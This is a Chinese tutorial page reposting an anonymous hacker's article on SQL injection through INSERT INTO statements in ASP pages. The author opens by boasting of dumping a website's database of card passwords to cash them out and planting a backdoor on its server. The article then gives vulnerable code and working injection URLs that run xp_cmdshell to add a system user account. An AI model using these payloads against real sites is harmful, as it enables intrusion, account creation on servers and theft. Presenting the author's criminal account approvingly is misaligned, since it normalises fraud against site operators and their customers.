• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >入侵防御 > 巧用数据库insert Into进行入侵注入

巧用数据库insert Into进行入侵注入

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了巧用数据库insert Into进行入侵注入 ,其中包含同音巧用的歇后语,借东风 巧用天时,家庭巧种巧用芽苗菜,什么借东风巧用天时,谁借东风巧用天时等知识点,遇到此问题的同学们可以参考下
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话; 突然看到"电影影线"有张海报,上面写着: 凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张; 我想,这个网站整个数据在我手里,我要是把那几十万张卡全拿去换钱不是发达了? 随即马上到他服务器把库拿下来,顺便在服务器上再留个后门; 在过程中有另一个想法便是本文的重要点;利用insert Into 进行注入。
============================================= 关于SQL注入,以前常用的或很多朋友所懂的也只不过是在select 语句中ID=变量未过产生的注入点,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我们可否利用insert Into Table的语句进行注入呢?
这样的话,我们可以在某某有漏洞的网站上填写QQ或Email或地址的地方执行任何命令了哦.
记得以前粗略地和"乱刀"讨论过,不过一直没有实际行动,刚才发现了一下,原来真的可以做到这一点。呵呵。举下例: 某个页面xiaomo.asp中有如下一句代码: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我们可以利用Request("U")未过滤的变量执行任意系统命令. 这段很简单,Request("U")在语句后面,直接提交: http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一个xiaomo密码为aa的系统用户 因为构造的代码变成了: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
当然理所当然地"正确"执行了。 ============================================= 我们换个思路,如果页面中的漏洞代码是: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,这该怎么办呢? 其实也很简单,变通一下即可,提交: http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出来了没?第一个变量代表了要写入的所有变量,而后面就不而而至了,哈哈。。 但有个问题是,我们必须得知道对方语句是怎么写,利在检查指定程序漏洞时所应用
</div>

您可能想查找下面的文章:

  • 巧用数据库insert Into进行入侵注入

相关文章

  • 黑客入侵“在线影院”全过程2
  • Sudo本地提权漏洞修复方案
  • 记一次入侵BT服务器
  • 浅析Linux系统后门技术和实践方法
  • IsThisLegit+Phinn:采用了机器学习算法的开源网络钓鱼防御与检测工具
  • 3389无法连接的5种原因分析
  • 浅析*NIX机器的入侵
  • serv_u提权记录: 530 Not logged in, home directory does not exist
  • eWebEditor编辑器成网站中的隐形炸弹
  • 开3389的5种方法

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Discuz X3.3补丁安全分析
    • 如何防御Sniffer攻击 Sniffer攻击详解
    • 黑客是如何突破一流检测系统的
    • 速破解无线路由器密码的全过程
    • 记一次入侵BT服务器
    • EditPlus查找PHP源码简单数字型注入的正则表达式
    • 黑客都很厉害吗 厉害的只是一小部分
    • UNIX主机的入侵
    • 一个百度应用差评引起的渗透 渗透百度应用全过程
    • 系统泄露密码的入侵攻击分析

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有